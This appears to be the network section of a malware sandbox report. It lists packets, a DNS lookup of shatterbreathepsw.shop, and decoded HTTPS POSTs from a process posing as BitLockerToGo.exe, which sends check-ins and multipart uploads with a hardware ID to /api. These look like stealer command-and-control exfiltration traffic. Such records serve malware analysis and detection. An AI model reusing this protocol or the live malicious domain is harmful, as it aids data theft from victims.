May 2, 2024 17:04:23.474237919 CEST | 443 | 49719 | 104.21.95.19 | 192.168.2.6
May 2, 2024 17:04:23.474251032 CEST | 49719 | 443 | 192.168.2.6 | 104.21.95.19
May 2, 2024 17:04:23.474442959 CEST | 443 | 49719 | 104.21.95.19 | 192.168.2.6
May 2, 2024 17:04:23.474473000 CEST | 443 | 49719 | 104.21.95.19 | 192.168.2.6
May 2, 2024 17:04:23.474486113 CEST | 49719 | 443 | 192.168.2.6 | 104.21.95.19
May 2, 2024 17:04:23.474492073 CEST | 443 | 49719 | 104.21.95.19 | 192.168.2.6
May 2, 2024 17:04:23.474530935 CEST | 49719 | 443 | 192.168.2.6 | 104.21.95.19
May 2, 2024 17:04:23.474651098 CEST | 443 | 49719 | 104.21.95.19 | 192.168.2.6
May 2, 2024 17:04:23.474705935 CEST | 443 | 49719 | 104.21.95.19 | 192.168.2.6
May 2, 2024 17:04:23.474745989 CEST | 49719 | 443 | 192.168.2.6 | 104.21.95.19
May 2, 2024 17:04:23.474750996 CEST | 443 | 49719 | 104.21.95.19 | 192.168.2.6
May 2, 2024 17:04:23.474792004 CEST | 443 | 49719 | 104.21.95.19 | 192.168.2.6
May 2, 2024 17:04:23.474828959 CEST | 443 | 49719 | 104.21.95.19 | 192.168.2.6
May 2, 2024 17:04:23.474833012 CEST | 49719 | 443 | 192.168.2.6 | 104.21.95.19
May 2, 2024 17:04:23.474838018 CEST | 443 | 49719 | 104.21.95.19 | 192.168.2.6
May 2, 2024 17:04:23.474879980 CEST | 49719 | 443 | 192.168.2.6 | 104.21.95.19
May 2, 2024 17:04:23.474961996 CEST | 443 | 49719 | 104.21.95.19 | 192.168.2.6
May 2, 2024 17:04:23.475014925 CEST | 443 | 49719 | 104.21.95.19 | 192.168.2.6
May 2, 2024 17:04:23.475061893 CEST | 49719 | 443 | 192.168.2.6 | 104.21.95.19
May 2, 2024 17:04:24.561712980 CEST | 49719 | 443 | 192.168.2.6 | 104.21.95.19
May 2, 2024 17:04:24.561749935 CEST | 443 | 49719 | 104.21.95.19 | 192.168.2.6
May 2, 2024 17:04:24.561763048 CEST | 49719 | 443 | 192.168.2.6 | 104.21.95.19
May 2, 2024 17:04:24.561769962 CEST | 443 | 49719 | 104.21.95.19 | 192.168.2.6
May 2, 2024 17:04:24.740978956 CEST | 49720 | 443 | 192.168.2.6 | 104.21.95.19
May 2, 2024 17:04:24.741014004 CEST | 443 | 49720 | 104.21.95.19 | 192.168.2.6
May 2, 2024 17:04:24.741091013 CEST | 49720 | 443 | 192.168.2.6 | 104.21.95.19
May 2, 2024 17:04:24.741485119 CEST | 49720 | 443 | 192.168.2.6 | 104.21.95.19
May 2, 2024 17:04:24.741498947 CEST | 443 | 49720 | 104.21.95.19 | 192.168.2.6
May 2, 2024 17:04:24.935204983 CEST | 443 | 49720 | 104.21.95.19 | 192.168.2.6
May 2, 2024 17:04:24.935352087 CEST | 49720 | 443 | 192.168.2.6 | 104.21.95.19
May 2, 2024 17:04:24.936789989 CEST | 49720 | 443 | 192.168.2.6 | 104.21.95.19
May 2, 2024 17:04:24.936799049 CEST | 443 | 49720 | 104.21.95.19 | 192.168.2.6
May 2, 2024 17:04:24.937041044 CEST | 443 | 49720 | 104.21.95.19 | 192.168.2.6
May 2, 2024 17:04:24.938534975 CEST | 49720 | 443 | 192.168.2.6 | 104.21.95.19
May 2, 2024 17:04:24.938692093 CEST | 49720 | 443 | 192.168.2.6 | 104.21.95.19
May 2, 2024 17:04:24.938719988 CEST | 443 | 49720 | 104.21.95.19 | 192.168.2.6
May 2, 2024 17:04:25.419720888 CEST | 443 | 49720 | 104.21.95.19 | 192.168.2.6
May 2, 2024 17:04:25.419821978 CEST | 443 | 49720 | 104.21.95.19 | 192.168.2.6
May 2, 2024 17:04:25.419877052 CEST | 49720 | 443 | 192.168.2.6 | 104.21.95.19
May 2, 2024 17:04:25.444894075 CEST | 49720 | 443 | 192.168.2.6 | 104.21.95.19
May 2, 2024 17:04:25.444916010 CEST | 443 | 49720 | 104.21.95.19 | 192.168.2.6
May 2, 2024 17:04:25.681627989 CEST | 49721 | 443 | 192.168.2.6 | 104.21.95.19
May 2, 2024 17:04:25.681714058 CEST | 443 | 49721 | 104.21.95.19 | 192.168.2.6
May 2, 2024 17:04:25.681799889 CEST | 49721 | 443 | 192.168.2.6 | 104.21.95.19
May 2, 2024 17:04:25.682173967 CEST | 49721 | 443 | 192.168.2.6 | 104.21.95.19
May 2, 2024 17:04:25.682200909 CEST | 443 | 49721 | 104.21.95.19 | 192.168.2.6
May 2, 2024 17:04:26.296406031 CEST | 443 | 49721 | 104.21.95.19 | 192.168.2.6
May 2, 2024 17:04:26.296516895 CEST | 49721 | 443 | 192.168.2.6 | 104.21.95.19
May 2, 2024 17:04:26.297916889 CEST | 49721 | 443 | 192.168.2.6 | 104.21.95.19
May 2, 2024 17:04:26.297941923 CEST | 443 | 49721 | 104.21.95.19 | 192.168.2.6
May 2, 2024 17:04:26.298245907 CEST | 443 | 49721 | 104.21.95.19 | 192.168.2.6
May 2, 2024 17:04:26.299654961 CEST | 49721 | 443 | 192.168.2.6 | 104.21.95.19
May 2, 2024 17:04:26.299863100 CEST | 49721 | 443 | 192.168.2.6 | 104.21.95.19
May 2, 2024 17:04:26.299901009 CEST | 443 | 49721 | 104.21.95.19 | 192.168.2.6
May 2, 2024 17:04:26.299957991 CEST | 49721 | 443 | 192.168.2.6 | 104.21.95.19
May 2, 2024 17:04:26.299971104 CEST | 443 | 49721 | 104.21.95.19 | 192.168.2.6
May 2, 2024 17:04:27.582772970 CEST | 443 | 49721 | 104.21.95.19 | 192.168.2.6
May 2, 2024 17:04:27.582920074 CEST | 443 | 49721 | 104.21.95.19 | 192.168.2.6
May 2, 2024 17:04:27.583009958 CEST | 49721 | 443 | 192.168.2.6 | 104.21.95.19
May 2, 2024 17:04:27.584614038 CEST | 49721 | 443 | 192.168.2.6 | 104.21.95.19
May 2, 2024 17:04:27.584654093 CEST | 443 | 49721 | 104.21.95.19 | 192.168.2.6
May 2, 2024 17:04:31.223807096 CEST | 49722 | 443 | 192.168.2.6 | 104.21.95.19
May 2, 2024 17:04:31.223836899 CEST | 443 | 49722 | 104.21.95.19 | 192.168.2.6
May 2, 2024 17:04:31.223906994 CEST | 49722 | 443 | 192.168.2.6 | 104.21.95.19
May 2, 2024 17:04:31.224284887 CEST | 49722 | 443 | 192.168.2.6 | 104.21.95.19
May 2, 2024 17:04:31.224299908 CEST | 443 | 49722 | 104.21.95.19 | 192.168.2.6
May 2, 2024 17:04:31.413702965 CEST | 443 | 49722 | 104.21.95.19 | 192.168.2.6
May 2, 2024 17:04:31.413820028 CEST | 49722 | 443 | 192.168.2.6 | 104.21.95.19
May 2, 2024 17:04:31.417568922 CEST | 49722 | 443 | 192.168.2.6 | 104.21.95.19
May 2, 2024 17:04:31.417574883 CEST | 443 | 49722 | 104.21.95.19 | 192.168.2.6
May 2, 2024 17:04:31.417809010 CEST | 443 | 49722 | 104.21.95.19 | 192.168.2.6
May 2, 2024 17:04:31.419255972 CEST | 49722 | 443 | 192.168.2.6 | 104.21.95.19
May 2, 2024 17:04:31.419549942 CEST | 49722 | 443 | 192.168.2.6 | 104.21.95.19
May 2, 2024 17:04:31.419579983 CEST | 443 | 49722 | 104.21.95.19 | 192.168.2.6
May 2, 2024 17:04:31.419677019 CEST | 49722 | 443 | 192.168.2.6 | 104.21.95.19
May 2, 2024 17:04:31.419687033 CEST | 443 | 49722 | 104.21.95.19 | 192.168.2.6
May 2, 2024 17:04:31.967907906 CEST | 443 | 49722 | 104.21.95.19 | 192.168.2.6
May 2, 2024 17:04:31.968025923 CEST | 443 | 49722 | 104.21.95.19 | 192.168.2.6
May 2, 2024 17:04:31.968090057 CEST | 49722 | 443 | 192.168.2.6 | 104.21.95.19
May 2, 2024 17:04:31.968394995 CEST | 49722 | 443 | 192.168.2.6 | 104.21.95.19
May 2, 2024 17:04:31.968406916 CEST | 443 | 49722 | 104.21.95.19 | 192.168.2.6
May 2, 2024 17:04:32.058706999 CEST | 49723 | 443 | 192.168.2.6 | 104.21.95.19
May 2, 2024 17:04:32.058739901 CEST | 443 | 49723 | 104.21.95.19 | 192.168.2.6
May 2, 2024 17:04:32.058819056 CEST | 49723 | 443 | 192.168.2.6 | 104.21.95.19
May 2, 2024 17:04:32.059165955 CEST | 49723 | 443 | 192.168.2.6 | 104.21.95.19
May 2, 2024 17:04:32.059180021 CEST | 443 | 49723 | 104.21.95.19 | 192.168.2.6
May 2, 2024 17:04:32.251857996 CEST | 443 | 49723 | 104.21.95.19 | 192.168.2.6
May 2, 2024 17:04:32.251959085 CEST | 49723 | 443 | 192.168.2.6 | 104.21.95.19
May 2, 2024 17:04:32.254769087 CEST | 49723 | 443 | 192.168.2.6 | 104.21.95.19
May 2, 2024 17:04:32.254775047 CEST | 443 | 49723 | 104.21.95.19 | 192.168.2.6
May 2, 2024 17:04:32.255543947 CEST | 443 | 49723 | 104.21.95.19 | 192.168.2.6
May 2, 2024 17:04:32.256735086 CEST | 49723 | 443 | 192.168.2.6 | 104.21.95.19
May 2, 2024 17:04:32.256918907 CEST | 49723 | 443 | 192.168.2.6 | 104.21.95.19
May 2, 2024 17:04:32.256944895 CEST | 443 | 49723 | 104.21.95.19 | 192.168.2.6
May 2, 2024 17:04:32.755954027 CEST | 443 | 49723 | 104.21.95.19 | 192.168.2.6
May 2, 2024 17:04:32.756072044 CEST | 443 | 49723 | 104.21.95.19 | 192.168.2.6
May 2, 2024 17:04:32.756118059 CEST | 49723 | 443 | 192.168.2.6 | 104.21.95.19
May 2, 2024 17:04:32.756289959 CEST | 49723 | 443 | 192.168.2.6 | 104.21.95.19
May 2, 2024 17:04:32.756300926 CEST | 443 | 49723 | 104.21.95.19 | 192.168.2.6
May 2, 2024 17:04:32.841825008 CEST | 49724 | 443 | 192.168.2.6 | 104.21.95.19
May 2, 2024 17:04:32.841878891 CEST | 443 | 49724 | 104.21.95.19 | 192.168.2.6
May 2, 2024 17:04:32.841959000 CEST | 49724 | 443 | 192.168.2.6 | 104.21.95.19
May 2, 2024 17:04:32.842406034 CEST | 49724 | 443 | 192.168.2.6 | 104.21.95.19
May 2, 2024 17:04:32.842422962 CEST | 443 | 49724 | 104.21.95.19 | 192.168.2.6
May 2, 2024 17:04:33.030770063 CEST | 443 | 49724 | 104.21.95.19 | 192.168.2.6
May 2, 2024 17:04:33.030834913 CEST | 49724 | 443 | 192.168.2.6 | 104.21.95.19
May 2, 2024 17:04:33.032361031 CEST | 49724 | 443 | 192.168.2.6 | 104.21.95.19
May 2, 2024 17:04:33.032368898 CEST | 443 | 49724 | 104.21.95.19 | 192.168.2.6
May 2, 2024 17:04:33.032598019 CEST | 443 | 49724 | 104.21.95.19 | 192.168.2.6
May 2, 2024 17:04:33.034034014 CEST | 49724 | 443 | 192.168.2.6 | 104.21.95.19
May 2, 2024 17:04:33.034149885 CEST | 49724 | 443 | 192.168.2.6 | 104.21.95.19
May 2, 2024 17:04:33.034156084 CEST | 443 | 49724 | 104.21.95.19 | 192.168.2.6
May 2, 2024 17:04:33.501748085 CEST | 443 | 49724 | 104.21.95.19 | 192.168.2.6
May 2, 2024 17:04:33.501871109 CEST | 443 | 49724 | 104.21.95.19 | 192.168.2.6
May 2, 2024 17:04:33.501940012 CEST | 49724 | 443 | 192.168.2.6 | 104.21.95.19
May 2, 2024 17:04:33.502104044 CEST | 49724 | 443 | 192.168.2.6 | 104.21.95.19
May 2, 2024 17:04:33.502126932 CEST | 443 | 49724 | 104.21.95.19 | 192.168.2.6
May 2, 2024 17:04:34.126347065 CEST | 49726 | 443 | 192.168.2.6 | 104.21.95.19
May 2, 2024 17:04:34.126384974 CEST | 443 | 49726 | 104.21.95.19 | 192.168.2.6
May 2, 2024 17:04:34.126491070 CEST | 49726 | 443 | 192.168.2.6 | 104.21.95.19
May 2, 2024 17:04:34.127001047 CEST | 49726 | 443 | 192.168.2.6 | 104.21.95.19
May 2, 2024 17:04:34.127015114 CEST | 443 | 49726 | 104.21.95.19 | 192.168.2.6
May 2, 2024 17:04:34.765595913 CEST | 443 | 49726 | 104.21.95.19 | 192.168.2.6
May 2, 2024 17:04:34.765682936 CEST | 49726 | 443 | 192.168.2.6 | 104.21.95.19
May 2, 2024 17:04:34.767190933 CEST | 49726 | 443 | 192.168.2.6 | 104.21.95.19
May 2, 2024 17:04:34.767200947 CEST | 443 | 49726 | 104.21.95.19 | 192.168.2.6
May 2, 2024 17:04:34.767847061 CEST | 443 | 49726 | 104.21.95.19 | 192.168.2.6
May 2, 2024 17:04:34.769098043 CEST | 49726 | 443 | 192.168.2.6 | 104.21.95.19
May 2, 2024 17:04:34.769958019 CEST | 49726 | 443 | 192.168.2.6 | 104.21.95.19
May 2, 2024 17:04:34.769988060 CEST | 443 | 49726 | 104.21.95.19 | 192.168.2.6
May 2, 2024 17:04:34.770071983 CEST | 49726 | 443 | 192.168.2.6 | 104.21.95.19
May 2, 2024 17:04:34.770103931 CEST | 443 | 49726 | 104.21.95.19 | 192.168.2.6
May 2, 2024 17:04:34.770229101 CEST | 49726 | 443 | 192.168.2.6 | 104.21.95.19
May 2, 2024 17:04:34.770288944 CEST | 443 | 49726 | 104.21.95.19 | 192.168.2.6
May 2, 2024 17:04:34.770405054 CEST | 49726 | 443 | 192.168.2.6 | 104.21.95.19
May 2, 2024 17:04:34.770431995 CEST | 443 | 49726 | 104.21.95.19 | 192.168.2.6
May 2, 2024 17:04:34.770562887 CEST | 49726 | 443 | 192.168.2.6 | 104.21.95.19
May 2, 2024 17:04:34.770590067 CEST | 443 | 49726 | 104.21.95.19 | 192.168.2.6
                                                            May 2, 2024 17:04:34.770709038 CEST49726443192.168.2.6104.21.95.19
                                                            May 2, 2024 17:04:34.770734072 CEST44349726104.21.95.19192.168.2.6
                                                            May 2, 2024 17:04:34.770751953 CEST49726443192.168.2.6104.21.95.19
                                                            May 2, 2024 17:04:34.770852089 CEST49726443192.168.2.6104.21.95.19
                                                            May 2, 2024 17:04:34.770879030 CEST49726443192.168.2.6104.21.95.19
                                                            May 2, 2024 17:04:34.816128969 CEST44349726104.21.95.19192.168.2.6
                                                            May 2, 2024 17:04:34.816301107 CEST49726443192.168.2.6104.21.95.19
                                                            May 2, 2024 17:04:34.816342115 CEST49726443192.168.2.6104.21.95.19
                                                            May 2, 2024 17:04:34.816368103 CEST49726443192.168.2.6104.21.95.19
                                                            May 2, 2024 17:04:34.860126019 CEST44349726104.21.95.19192.168.2.6
                                                            May 2, 2024 17:04:34.860280991 CEST49726443192.168.2.6104.21.95.19
                                                            May 2, 2024 17:04:34.860327005 CEST49726443192.168.2.6104.21.95.19
                                                            May 2, 2024 17:04:34.860348940 CEST49726443192.168.2.6104.21.95.19
                                                            May 2, 2024 17:04:34.908118963 CEST44349726104.21.95.19192.168.2.6
                                                            May 2, 2024 17:04:34.908205986 CEST49726443192.168.2.6104.21.95.19
                                                            May 2, 2024 17:04:34.952131033 CEST44349726104.21.95.19192.168.2.6
                                                            May 2, 2024 17:04:35.701798916 CEST44349726104.21.95.19192.168.2.6
                                                            May 2, 2024 17:04:38.847381115 CEST44349726104.21.95.19192.168.2.6
                                                            May 2, 2024 17:04:38.847511053 CEST44349726104.21.95.19192.168.2.6
                                                            May 2, 2024 17:04:38.847583055 CEST49726443192.168.2.6104.21.95.19
                                                            May 2, 2024 17:04:38.847727060 CEST49726443192.168.2.6104.21.95.19
                                                            May 2, 2024 17:04:38.847747087 CEST44349726104.21.95.19192.168.2.6
Timestamp | Source Port | Dest Port | Source IP | Dest IP
May 2, 2024 17:04:21.035949945 CEST | 51308 | 53 | 192.168.2.6 | 1.1.1.1
May 2, 2024 17:04:21.134630919 CEST | 53 | 51308 | 1.1.1.1 | 192.168.2.6
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
May 2, 2024 17:04:21.035949945 CEST | 192.168.2.6 | 1.1.1.1 | 0x7b2b | Standard query (0) | shatterbreathepsw.shop | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
May 2, 2024 17:04:21.134630919 CEST | 1.1.1.1 | 192.168.2.6 | 0x7b2b | No error (0) | shatterbreathepsw.shop | | 104.21.95.19 | A (IP address) | IN (0x0001) | false
May 2, 2024 17:04:21.134630919 CEST | 1.1.1.1 | 192.168.2.6 | 0x7b2b | No error (0) | shatterbreathepsw.shop | | 172.67.169.43 | A (IP address) | IN (0x0001) | false
• shatterbreathepsw.shop
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49718 | 104.21.95.19 | 443 | 7060 | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Timestamp | Bytes transferred | Direction | Data
2024-05-02 15:04:21 UTC | 269 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: shatterbreathepsw.shop
2024-05-02 15:04:21 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
Data Ascii: act=life
2024-05-02 15:04:22 UTC | 806 | IN | HTTP/1.1 200 OK
Date: Thu, 02 May 2024 15:04:22 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=dtfar21nn9shiefnjmdmm6ismp; expires=Mon, 26-Aug-2024 08:51:01 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yCNxCskk87i9Vhd74gsbmEQCnwBdDdMpxb1dx33KGQqEbHIB5XYclMwaWgqZM7ppmEadtq6Y95uFJL%2B%2FW1Sh%2FgzuxXJ9NobovWMMTnqohQ3wfcpkuxPneCslPKYSYQI15vQUGdPB%2B4GK"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 87d8e740cce864f0-GIG
alt-svc: h3=":443"; ma=86400
2024-05-02 15:04:22 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
Data Ascii: 2ok
2024-05-02 15:04:22 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.6 | 49719 | 104.21.95.19 | 443 | 7060 | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Timestamp | Bytes transferred | Direction | Data
2024-05-02 15:04:22 UTC | 270 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 56
Host: shatterbreathepsw.shop
2024-05-02 15:04:22 UTC | 56 | OUT | Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 78 70 73 47 56 46 2d 2d 47 45 49 52 4f 50 41 26 6a 3d 64 65 66 61 75 6c 74
Data Ascii: act=recive_message&ver=4.0&lid=xpsGVF--GEIROPA&j=default
2024-05-02 15:04:23 UTC | 806 | IN | HTTP/1.1 200 OK
Date: Thu, 02 May 2024 15:04:23 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=9pghrtbdj0hfmgc2l52cd9mkj2; expires=Mon, 26-Aug-2024 08:51:02 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JADYYFdES6CR27WWCHagA7Stn%2F5Gks4JT6ECguS8XjiQM4EKVcghtbwtKa%2BJ78bEgXU2NGEDUgiCyqeJMpxMEGZb6%2F7KxYKCk1aqBWr6vvsqnAsdrjSmi0rAWcjicrY8%2FEVDR5InCpW6"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 87d8e74898148c17-EWR
alt-svc: h3=":443"; ma=86400


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.6 | 49720 | 104.21.95.19 | 443 | 7060 | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Timestamp | Bytes transferred | Direction | Data
2024-05-02 15:04:24 UTC | 288 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 12861
Host: shatterbreathepsw.shop
2024-05-02 15:04:24 UTC | 12861 | OUT | Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 43 44 45 36 43 33 45 35 37 35 33 30 36 43 39 41 46 46 45 37 36 34 30 44 36 39 41 36 39 35 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 78 70 73 47 56 46 2d 2d 47 45 49 52 4f
Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"8CDE6C3E575306C9AFFE7640D69A6953--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"xpsGVF--GEIRO
2024-05-02 15:04:25 UTC | 814 | IN | HTTP/1.1 200 OK
Date: Thu, 02 May 2024 15:04:25 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=0tflvessie5al68n17to1bo77h; expires=Mon, 26-Aug-2024 08:51:04 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1ap%2F%2Byo5jeR6%2FKNkcF9XcB6ZVS%2BK3uGeWK0VGRUmfiBoQk2FcUugPdwTR9EKDwU7FPpX3Vifjyrc3W%2FYmsNkQ1V4wzAB3IypLrkb%2B2kjYMnuG%2FHS3Yo6MxevohYYyty%2F03NaKJmU63ts"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 87d8e7542ae47ca2-EWR
alt-svc: h3=":443"; ma=86400
2024-05-02 15:04:25 UTC | 23 | IN | Data Raw: 31 31 0d 0a 6f 6b 20 31 39 31 2e 39 36 2e 31 35 30 2e 32 32 35 0d 0a
Data Ascii: 11ok 191.96.150.225
2024-05-02 15:04:25 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.6 | 49721 | 104.21.95.19 | 443 | 7060 | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Timestamp | Bytes transferred | Direction | Data
2024-05-02 15:04:26 UTC | 288 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 15107
Host: shatterbreathepsw.shop
2024-05-02 15:04:26 UTC | 15107 | OUT | Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 43 44 45 36 43 33 45 35 37 35 33 30 36 43 39 41 46 46 45 37 36 34 30 44 36 39 41 36 39 35 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 78 70 73 47 56 46 2d 2d 47 45 49 52 4f
Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"8CDE6C3E575306C9AFFE7640D69A6953--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"xpsGVF--GEIRO
2024-05-02 15:04:27 UTC | 804 | IN | HTTP/1.1 200 OK
Date: Thu, 02 May 2024 15:04:27 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=gvn9lij6q4edivaatnfs9qhumk; expires=Mon, 26-Aug-2024 08:51:06 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rYxvKB7yB1JF2YATr3222jTQb%2FZaECHUqIitv0f9m8ZHEexZ5OA4ONvaCOZB7naJz1yhbE9giU3tVc%2FSXjLIboZxuUw6SShOh1zYgMl6wB51%2FjiSp0AtzQiH2PIY0HpkXtw1x39TtLT3"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 87d8e75d5eb95f22-SYD
alt-svc: h3=":443"; ma=86400
2024-05-02 15:04:27 UTC | 23 | IN | Data Raw: 31 31 0d 0a 6f 6b 20 31 39 31 2e 39 36 2e 31 35 30 2e 32 32 35 0d 0a
Data Ascii: 11ok 191.96.150.225
2024-05-02 15:04:27 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID: 4 | Source IP: 192.168.2.6 | Source Port: 49722 | Destination IP: 104.21.95.194 | Destination Port: 443 | PID: 7060 | Process: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Timestamp | Bytes transferred | Direction | Data
2024-05-02 15:04:31 UTC | 288 | OUT | POST /api HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                            Content-Length: 19965
                                                            Host: shatterbreathepsw.shop
2024-05-02 15:04:31 UTC | 15331 | OUT | Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 43 44 45 36 43 33 45 35 37 35 33 30 36 43 39 41 46 46 45 37 36 34 30 44 36 39 41 36 39 35 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 78 70 73 47 56 46 2d 2d 47 45 49 52 4f
